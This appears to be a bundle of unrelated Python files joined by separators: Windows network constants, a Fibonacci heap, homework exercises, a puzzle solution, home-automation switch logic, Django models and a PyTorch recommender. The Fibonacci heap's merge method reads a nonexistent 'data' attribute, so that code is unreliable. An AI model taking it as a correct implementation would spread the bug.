testBedHostIP=options.testBedHostIP)
message.delete(options.reportNames) |
# Copyright (C) 2020 FireEye, Inc. All Rights Reserved.
RESOURCE_CONNECTED = 1
RESOURCE_GLOBALNET = 2
RESOURCE_REMEMBERED = 3
RESOURCE_CONTEXT = 5
RESOURCETYPE_ANY = 0
RESOURCETYPE_DISK = 1
RESOURCETYPE_PRINT = 2
RESOURCEUSAGE_CONNECTABLE = 1
RESOURCEUSAGE_CONTAINER = 2
RESOURCEUSAGE_ATTACHED = 0x10
RESOURCEUSAGE_ALL = 0x13
ERROR_NO_NETWORK = 0x4C6
def get_define_int(define, prefix=''):
for k, v in globals().items():
if not isinstance(v, int) or v != define:
continue
if prefix:
if k.startswith(prefix):
return k
else:
return k
|
from math import log
class FiboNode:
def __init__(self, parent=None, child=None, left=None, right=None,
val=None, degree=0, mark=False):
self.parent = parent
self.child = child
self.left = left
self.right = right
self.val = val
self.degree = degree
self.mark = mark
class FiboHeap:
def __init__(self):
self._min = None
self._num = 0
self._trees = 0
def _link(self, _child, _parent):
_child.left.right = _child.right
_child.right.left = _child.left
if _parent.child:
last_child = _parent.child.left
last_child.right = _child
_child.left = last_child
_child.right = _parent.child
_parent.child.left = _child
_parent.child = _child
else:
_child.right = _child.left = _child
_parent.child = _child
_parent.degree += 1
_parent.mark = False
_child.parent = _parent
def _consolidate(self):
helper = [None for i in range(0, int(log(self._num, 2)) + 1)]
root = self._min
for i in range(1, self._trees + 1):
deg = root.degree
while deg < len(helper) and helper[deg] is not None:
pointer = helper[deg]
if root.val > pointer.val:
root, pointer = pointer, root
self._link(pointer, root)
helper[deg] = None
deg += 1
helper[deg] = root
root = root.right
self._min = None
for item in helper:
if item:
if not self._min:
self._min = item
self._min.left = self._min.right = self._min
self._trees = 1
else:
tail = self._min.left
tail.right = item
item.left = tail
item.right = self._min
self._min.left = item
self._trees += 1
if self._min.val > item.val:
self._min = item
def _cut(self, x, y):
x.left.right = x.right
x.right.left = x.left
if x == y.child:
y.child = x.right
y.degree -= 1
self._min.left.right = x
x.left = self._min.left
x.right = self._min
self._min.left = x
self._trees += 1
x.parent = None
x.mark = False
def _cascading_cut(self, y):
parent = y.parent
if parent:
if not y.mark:
y.mark = True
else:
self._cut(y, parent)
self._cascading_cut(parent)
def insert(self, val):
new_node = FiboNode(val=val)
if self._min:
self._min.left.right = new_node
new_node.left = self._min.left
self._min.left = new_node
new_node.right = self._min
if val < self._min.val:
self._min = new_node
else:
self._min = new_node
new_node.mark = True
new_node.left = new_node
new_node.right = new_node
self._num += 1
self._trees += 1
def minimun(self):
return self._min.val
def minimal_node(self) -> FiboNode:
return self._min
def pop_min(self):
min_node = self._min
if not min_node:
return
if self._num == 1:
self._min = None
return min_node.val
child = min_node.child
if child:
for i in range(1, min_node.degree + 1):
child.parent = None
child = child.right
child1 = min_node.child
child_last = min_node.child.left
tail = min_node.left
child1.left = tail
tail.right = child1
min_node.right.left = child_last
child_last.right = min_node.right
self._num -= 1
self._trees = self._trees - 1 + min_node.degree
self._min = self._min.right
self._consolidate()
return min_node.val
@staticmethod
def unite_heap(heap_l, heap_r):
if not heap_l._min:
del heap_l
return heap_r
if not heap_r._min:
del heap_r
return heap_l
tail_l = heap_l._min.left
tail_r = heap_r._min.left
tail_r.right = heap_l._min
heap_l._min.left = tail_r
tail_l.right = heap_r._min
heap_r._min.left = tail_l
res = FiboHeap()
res._min = heap_l._min if heap_l._min.data < heap_r._min.val else heap_r._min
res._num = heap_l._num + heap_r._num
res._trees = heap_l._trees + heap_r._trees
del heap_r
del heap_l
return res
def __str__(self):
mini = self._min.right
res = str(self._num) + ":"
while not mini.mark:
res += " " + str(mini.degree)
mini = mini.right
return res
|
## Santosh Khadka - 03-Methods and Functions/08-Functions and Methods Homework.ipynb
import re
import string
def vol(rad):
'''
Write a function that computes the volume of a sphere given its radius.
Volume=(4/3)*pi*(radius^3)
'''
c1 = 4/3
pi = 3.14
volume = c1*pi*(rad**3)
return volume
def ran_check(num, low, high):
'''
Write a function that checks whether a number is in a given range (inclusive of high and low)
'''
if(num <= high) and (num >= low):
print(num, 'is in the range between', low, 'and', high)
#return (num in range(low, high+1))
def ran_bool(num, low, high):
'''
Write a function that checks whether a number is in a given range (inclusive of high and low)
'''
return ((num <= high) and (num >= low))
def up_low(s):
'''
Write a Python function that accepts a string and calculates the number of upper case letters and lower case letters.
'''
uppers = 0; lowers = 0
regex = re.compile('[^a-zA-Z]') # removes all non-alphabet characters from the string
string1 = regex.sub('', s)
#print(string1)
for char in string1:
if char == char.lower():
lowers += 1
else:
uppers += 1
print('Original String :', s)
print('No. of Upper case characters :', uppers)
print('No. of Lower case Characters :', lowers)
def unique_list(lst):
'''
Write a Python function that takes a list and returns a new list with unique elements of the first list.
'''
u_set = set()
u_list = []
for x in range(len(lst)):
#print(lst[x])
u_set.add(lst[x])
u_list += u_set # can also do "u_list.extend(u_set)"
return u_list
#return list(set(lst)) # 1 line solution: turns given list into set(removes duplicates) then turns set into list
def multiply(numbers):
'''
Write a Python function to multiply all the numbers in a list.
'''
total = numbers[0]
for x in range(1, len(numbers)):
total = total*numbers[x]
return total
def palindrome(s):
'''
Write a Python function that checks whether a word or phrase is palindrome or not.
'''
s = s.replace(' ', '')
reverse_s = s[::-1]
return s == reverse_s
#return s == s[::-1]
def isPangram(str1, alphabet=string.ascii_lowercase): # alphabet set by default so no alphabet argument needed
# alphabet = abcdefghijklmnopqrstuvwxyz
'''
Write a Python function to check whether a string is pangram or not.
(Assume the string passed in does not have any punctuation)
*Note : Pangrams are words or sentences containing every letter of the alphabet at least once.
For example : "The quick brown fox jumps over the lazy dog"
'''
for x in range(len(alphabet)):
if alphabet[x] in str1:
continue
else:
return False
return True
def func_check(func_name):
if "vol" in str(func_name):
print('{0:.6g}'.format(vol(2))) # formatted output
if "ran_check" in str(func_name):
ran_check(5, 2, 7)
if "ran_bool" in str(func_name):
print(ran_bool(3, 1, 10))
if "up_low" in str(func_name):
up_low("Hello Mr. Rogers, how are you this fine Tuesday?")
if "unique_list" in str(func_name):
print(unique_list([1,1,1,1,2,2,3,3,3,3,4,5]))
if "multiply" in str(func_name):
print(multiply([1,2,3,-4]))
if "palindrome" in str(func_name):
print(palindrome("helleh"))
print(palindrome("tenet tenet"))
print(palindrome("asdasd"))
if "isPangram" in str(func_name):
#alphabet = 'abcdefghijklmnopqrstuvwxyz'
#print(isPangram("The quick brown fox jumps over the lazy dog", alphabet))
print(isPangram("The quick brown fox jumps over the lazy dog"))
print(isPangram("This should return False"))
def main():
# func_check(vol)
# func_check(ran_check)
# func_check(ran_bool)
# func_check(up_low)
# func_check(unique_list)
# func_check(multiply)
# func_check(palindrome)
func_check(isPangram)
if __name__ == "__main__":
main() |
import sys
def stripped_lines(filename):
with open(filename) as f:
for line in f.readlines():
yield line.strip()
def parse_ranges(range1, range2):
def bounds(r):
splitted = r.split('-')
return int(splitted[0]), int(splitted[1])
lo1, hi1 = bounds(range1)
lo2, hi2 = bounds(range2)
return lambda x: (x >= lo1 and x <= hi1) or (x >= lo2 and x <= hi2)
def parse_ticket(line):
return [int(v) for v in line.split(',')]
def parse_file(filename):
state = 0
rules = {}
nearby_tickets = []
for line in stripped_lines(filename):
if line == '':
state += 1
continue
if line == 'your ticket:' or line == 'nearby tickets:':
continue
if state == 0:
key_end = line.index(':')
key = line[0:key_end]
range1_end = line.index(' or ')
range1 = line[key_end + 2: range1_end]
range2 = line[range1_end + 4:]
check_range = parse_ranges(range1, range2)
rules[key] = check_range
elif state == 1:
your_ticket = parse_ticket(line)
else:
nearby_tickets.append(parse_ticket(line))
return rules, your_ticket, nearby_tickets
def validate(rules, value):
return any(rule(value) for rule in rules.values())
def p1(rules, nearby_tickets):
invalid_sum = 0
valid_tickets = []
for ticket in nearby_tickets:
valid = True
for value in ticket:
if not validate(rules, value):
valid = False
invalid_sum += value
if valid:
valid_tickets.append(ticket)
return invalid_sum, valid_tickets
def possible_columns(key, rule, tickets, ncol):
result = []
for column in range(ncol):
if all(rule(ticket[column]) for ticket in tickets):
result.append(column)
return result
def get_column_map(rules, valid_tickets):
ncol = len(valid_tickets[0])
possibles = []
# figure out which columns could satisfy which rules
for key, rule in rules.items():
columns = possible_columns(key, rule, valid_tickets, ncol)
possibles.append((columns, key))
# sort by number of possible columns so that we can satisfy
# the most constrained rules first
possibles.sort(key=lambda a: len(a[0]))
column_map = {}
taken_columns = set()
for columns, key in possibles:
for column in columns:
if column not in taken_columns:
column_map[key] = column
taken_columns.add(column)
break
assert len(column_map) == ncol
return column_map
def p2(rules, your_ticket, valid_tickets):
column_map = get_column_map(rules, valid_tickets)
result = 1
for key, col in column_map.items():
if key.find('departure') == 0:
result *= your_ticket[col]
return result
def main(args):
inputs = parse_file(args[1])
rules, your_ticket, nearby_tickets = inputs
p1_ans, valid_tickets = p1(rules, nearby_tickets)
print(f'part one: {p1_ans}')
p2_ans = p2(rules, your_ticket, valid_tickets)
print(f'part two: {p2_ans}')
# part one: 25788
# part two: 3902565915559
if __name__ == '__main__':
main(sys.argv)
|
"""Define automations for switches."""
# pylint: disable=attribute-defined-outside-init,unused-argument
from typing import Union
from automation import Automation, Feature # type: ignore
from const import ( # type: ignore
BLACKOUT_END, BLACKOUT_START, THRESHOLD_CLOUDY)
from util.scheduler import run_on_days # type: ignore
class SwitchAutomation(Automation):
"""Define an automation for switches."""
class BaseFeature(Feature):
"""Define a base feature for all switches."""
@property
def state(self) -> bool:
"""Return the current state of the switch."""
return self.hass.get_state(self.entities['switch'])
def initialize(self) -> None:
"""Initialize."""
raise NotImplementedError
def toggle(self, state: str) -> None:
"""Toggle the switch state."""
if self.state == 'off' and state == 'on':
self.hass.log('Turning on: {0}'.format(self.entities['switch']))
self.hass.turn_on(self.entities['switch'])
elif self.state == 'on' and state == 'off':
self.hass.log('Turning off: {0}'.format(self.entities['switch']))
self.hass.turn_off(self.entities['switch'])
def toggle_on_schedule(self, kwargs: dict) -> None:
"""Turn off the switch at a certain time."""
self.toggle(kwargs['state'])
class PresenceFailsafe(BaseFeature):
"""Define a feature to restrict activation when we're not home."""
def initialize(self) -> None:
"""Initialize."""
self.hass.listen_state(
self.switch_activated,
self.entities['switch'],
new='on',
constrain_noone='just_arrived,home',
constrain_input_boolean=self.enabled_toggle)
def switch_activated( # pylint: disable=too-many-arguments
self, entity: Union[str, dict], attribute: str, old: str, new: str,
kwargs: dict) -> None:
"""Turn the switch off if no one is home."""
self.hass.log('No one home; not allowing switch to activate')
self.toggle('off')
class SleepTimer(BaseFeature):
"""Define a feature to turn a switch off after an amount of time."""
def initialize(self) -> None:
"""Initialize."""
self._handle = None
self.hass.listen_state(
self.timer_changed,
self.entities['timer_slider'],
constrain_input_boolean=self.enabled_toggle)
self.hass.listen_state(
self.switch_turned_off,
self.entities['switch'],
new='off',
constrain_input_boolean=self.enabled_toggle)
def switch_turned_off( # pylint: disable=too-many-arguments
self, entity: Union[str, dict], attribute: str, old: str, new: str,
kwargs: dict) -> None:
"""Reset the sleep timer when the switch turns off."""
self.hass.call_service(
'input_number/set_value',
entity_id=self.entities['timer_slider'],
value=0)
def timer_changed( # pylint: disable=too-many-arguments
self, entity: Union[str, dict], attribute: str, old: str, new: str,
kwargs: dict) -> None:
"""Start/stop a sleep timer for this switch."""
minutes = int(float(new))
if minutes == 0:
self.hass.log('Deactivating sleep timer')
self.toggle('off')
self.hass.cancel_timer(self._handle)
else:
self.hass.log(
'Activating sleep timer: {0} minutes'.format(minutes))
self.toggle('on')
self._handle = self.hass.run_in(self.timer_completed, minutes * 60)
def timer_completed(self, kwargs: dict) -> None:
"""Turn off a switch at the end of sleep timer."""
self.hass.log('Sleep timer over; turning switch off')
self.hass.call_service(
'input_number/set_value',
entity_id=self.entities['timer_slider'],
value=0)
class ToggleAtTime(BaseFeature):
"""Define a feature to toggle a switch at a certain time."""
@property
def repeatable(self) -> bool:
"""Define whether a feature can be implemented multiple times."""
return True
def initialize(self) -> None:
"""Initialize."""
if self.properties['schedule_time'] in ['sunrise', 'sunset']:
method = getattr(
self.hass, 'run_at_{0}'.format(
self.properties['schedule_time']))
method(
self.toggle_on_schedule,
state=self.properties['state'],
offset=self.properties.get('seasonal_offset', False),
constrain_input_boolean=self.enabled_toggle,
constrain_anyone='just_arrived,home'
if self.properties.get('presence_required') else None)
else:
if self.properties.get('run_on_days'):
run_on_days(
self.hass,
self.toggle_on_schedule,
self.properties['run_on_days'],
self.hass.parse_time(self.properties['schedule_time']),
state=self.properties['state'],
constrain_input_boolean=self.enabled_toggle)
else:
self.hass.run_daily(
self.toggle_on_schedule,
self.hass.parse_time(self.properties['schedule_time']),
state=self.properties['state'],
constrain_input_boolean=self.enabled_toggle)
class ToggleIfToggled(BaseFeature):
"""Define a feature to immediately toggle a switch back."""
def initialize(self) -> None:
"""Initialize."""
self.hass.listen_state(
self.switch_toggled,
self.entities['switch'],
constrain_input_boolean=self.enabled_toggle)
def delay_complete(self, kwargs: dict) -> None:
"""Toggle the switch back after a delay."""
self.toggle(self.properties['desired_state'])
def switch_toggled( # pylint: disable=too-many-arguments
self, entity: Union[str, dict], attribute: str, old: str, new: str,
kwargs: dict) -> None:
"""Toggle the switch back."""
if new != self.properties['desired_state']:
if self.properties.get('delay'):
self.handles[self.hass.friendly_name] = self.hass.run_in(
self.delay_complete, self.properties['delay'])
else:
self.toggle(self.properties['desired_state'])
else:
if self.hass.friendly_name in self.handles:
handle = self.handles.pop(self.hass.friendly_name)
self.hass.cancel_timer(handle)
class TurnOnUponArrival(BaseFeature):
"""Define a feature to turn a switch on when one of us arrives."""
def initialize(self) -> None:
"""Initialize."""
if self.properties.get('possible_conditions'):
for name, value in self.properties['possible_conditions'].items():
self.listen_for_arrival({name: value})
else:
self.listen_for_arrival()
def listen_for_arrival(self, constraint_kwargs: dict = None) -> None:
"""Create an event listen for someone arriving."""
if not constraint_kwargs:
constraint_kwargs = {}
if self.properties.get('trigger_on_first_only'):
constraint_kwargs['first'] = True
self.hass.listen_event(
self.someone_arrived,
'PRESENCE_CHANGE',
new=self.hass.presence_manager.HomeStates.just_arrived.value,
constrain_input_boolean=self.enabled_toggle,
**constraint_kwargs)
def someone_arrived(
self, event_name: str, data: dict, kwargs: dict) -> None:
"""Turn on after dark when someone comes homes."""
self.hass.log('Someone came home after dark; turning on the switch')
self.toggle('on')
class TurnOnWhenCloudy(BaseFeature):
"""Define a feature to turn a switch on at certain cloud coverage."""
def initialize(self) -> None:
"""Initialize."""
self.cloudy = False
self.hass.listen_state(
self.cloud_coverage_reached,
self.entities['cloud_cover'],
constrain_start_time=BLACKOUT_END,
constrain_end_time=BLACKOUT_START,
constrain_input_boolean=self.enabled_toggle,
constrain_anyone='just_arrived,home'
if self.properties.get('presence_required') else None)
def cloud_coverage_reached( # pylint: disable=too-many-arguments
self, entity: Union[str, dict], attribute: str, old: str, new: str,
kwargs: dict) -> None:
"""Turn on the switch when a "cloudy event" occurs."""
try:
cloud_cover = float(new)
except ValueError:
cloud_cover = 0.0
if (not self.cloudy and cloud_cover >= THRESHOLD_CLOUDY):
self.hass.log('Cloud cover above {0}%'.format(cloud_cover))
self.toggle('on')
self.cloudy = True
elif (self.cloudy and cloud_cover < THRESHOLD_CLOUDY):
self.hass.log('Cloud cover below {0}%'.format(cloud_cover))
self.toggle('off')
self.cloudy = False
class VacationMode(BaseFeature):
"""Define a feature to simulate craziness when we're out of town."""
def initialize(self) -> None:
"""Initialize."""
self._off_handle = None
self._on_handle = None
self.hass.listen_event(
self.vacation_mode_toggled, 'MODE_CHANGE', mode='vacation_mode')
def vacation_mode_toggled(
self, event_name: str, data: dict, kwargs: dict) -> None:
"""Respond to changes when vacation mode gets toggled."""
if data['state'] == 'on':
self._on_handler = self.hass.run_at_sunset(
self.toggle_on_schedule,
state='on',
random_start=-60 * 60 * 1,
random_end=60 * 30 * 1)
self._off_handler = self.hass.run_at_sunset(
self.toggle_on_schedule,
state='off',
random_start=60 * 60 * 2,
random_end=60 * 60 * 4)
else:
self.hass.cancel_timer(self._off_handle)
self.hass.cancel_timer(self._on_handle)
|
from django.apps import AppConfig
class KawswebenterConfig(AppConfig):
name = 'KawsWebEnter'
|
#
# Copyright © 2021 Uncharted Software Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import numpy as np
import torch
from torch import nn
from torch.nn import functional as F
from torch.utils.data import DataLoader, TensorDataset
from basenet import BaseNet, HPSchedule
from basenet.helpers import to_numpy
from .base import DistilBaseModel
from .metrics import metrics, classification_metrics, regression_metrics
# --
# Models
class CFModel(BaseNet):
def __init__(self, loss_fn, n_users, n_items, emb_dim=1024, n_outputs=1):
super().__init__(loss_fn=loss_fn)
self.emb_users = nn.Embedding(n_users, emb_dim)
self.emb_items = nn.Embedding(n_items, emb_dim)
self.emb_users.weight.data.uniform_(-0.05, 0.05)
self.emb_items.weight.data.uniform_(-0.05, 0.05)
self.user_bias = nn.Embedding(n_users, 1)
self.item_bias = nn.Embedding(n_items, 1)
self.user_bias.weight.data.uniform_(-0.01, 0.01)
self.item_bias.weight.data.uniform_(-0.01, 0.01)
self.hidden = nn.Linear(2 * emb_dim, emb_dim)
self.score = nn.Linear(emb_dim, n_outputs, bias=False)
def forward(self, x):
users, items = x[:, 0], x[:, 1]
user_emb = self.emb_users(users)
item_emb = self.emb_items(items)
# ?? Dropout
emb = torch.cat([user_emb, item_emb], dim=1)
emb = self.hidden(emb)
emb = F.relu(emb)
return self.score(emb) + self.user_bias(users) + self.item_bias(items)
class SGDCollaborativeFilter(DistilBaseModel):
def __init__(
self,
n_users,
n_items,
emb_dims=[128, 256, 512, 1024],
n_outputs=1,
epochs=8,
batch_size=512,
lr_max=2e-3,
device="cuda",
):
self.loss_fn = F.l1_loss # hard coded loss
# if target_metric == 'meanAbsoluteError':
# self.loss_fn = F.l1_loss
# # elif target_metric == 'accuracy':
# # self.loss_fn = F.binary_cross_entropy_with_logits
# else:
# raise Exception('SGDCollaborativeFilter: unknown metric')
self.n_users = n_users
self.n_items = n_items
self.emb_dims = emb_dims
self.n_outputs = n_outputs
self.epochs = epochs
self.batch_size = batch_size
self.device = device
self.lr_max = lr_max
def _make_model(self, emb_dim):
model = CFModel(
emb_dim=emb_dim,
loss_fn=self.loss_fn,
n_users=self.n_users,
n_items=self.n_items,
n_outputs=self.n_outputs,
)
model.init_optimizer(
opt=torch.optim.Adam,
params=model.parameters(),
hp_scheduler={
"lr": HPSchedule.linear(hp_max=self.lr_max, epochs=self.epochs)
},
)
return model
def fit(self, X_train, y_train, U_train=None):
dataloaders = {
"train": DataLoader(
TensorDataset(
torch.LongTensor(X_train.values),
torch.FloatTensor(y_train).view(-1, 1),
),
shuffle=True,
batch_size=self.batch_size,
),
}
# --
# Train
self._models = [self._make_model(emb_dim=emb_dim) for emb_dim in self.emb_dims]
for i, model in enumerate(self._models):
print("model=%d" % i, file=sys.stderr)
model = model.to(self.device)
for epoch in range(self.epochs):
train = model.train_epoch(dataloaders, mode="train", compute_acc=False)
print(
{
"epoch": int(epoch),
"train_loss": float(np.mean(train["loss"])),
},
file=sys.stderr,
)
model = model.to("cpu")
# clean up to allow pickling
for model in self._models:
del model.opt
del model.hp_scheduler
return self
def predict(self, X):
dataloaders = {
"test": DataLoader(
TensorDataset(
torch.LongTensor(X.values),
torch.FloatTensor(np.zeros(X.shape[0]) - 1).view(-1, 1),
),
shuffle=False,
batch_size=self.batch_size,
)
}
# --
# Test
all_preds = []
for model in self._models:
model = model.to(self.device)
preds, _ = model.predict(dataloaders, mode="test")
all_preds.append(to_numpy(preds).squeeze())
model = model.to("cpu")
return np.vstack(all_preds).mean(axis=0)
|
STANDARD_BLANK_INDEX = 8
ROW_LENGTH = 12
KNOWN_CONCENTRATIONS = [2000, 1500, 1000, 750, 500, 250, 125, 25, 0]
BCA_CONCENTRATION_COLUMN = "Conc [ug/mL]"
DEFAULT_LEVEL1_COL = "Cell Type"
DEFAULT_LEVEL2_COL = "Method (KF or manual)"
DEFAULT_SAMPLE_START = "C1"
DEFAULT_SAMPLE_END = "C12"
DEFAULT_NUM_REPLICATES = 1
|
from django.db import models
from authentication.models import User
class Customer(models.Model):
first_name = models.CharField(max_length=400, blank=True, default='')
last_name = models.CharField(max_length=400, blank=True, default='')
email = models.EmailField(blank=True)
owner = models.ForeignKey(User, on_delete=models.CASCADE)
company = models.CharField(max_length=400, blank=True, default='')
phone = models.CharField(max_length=400, blank=True, default='')
apartment = models.CharField(max_length=400, blank=True, default='')
address = models.CharField(max_length=400, blank=True, default='')
city = models.CharField(max_length=400, blank=True, default='')
country = models.CharField(max_length=400, blank=True, default='')
region = models.CharField(max_length=400, blank=True, default='')
postal_code = models.CharField(max_length=400, blank=True, default='')
image = models.CharField(max_length=400, blank=True, default='')
class Meta:
db_table = 'customer'
def __str__(self):
"""TODO: Docstring for __repr__.
:returns: TODO
"""
return self.first_name
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.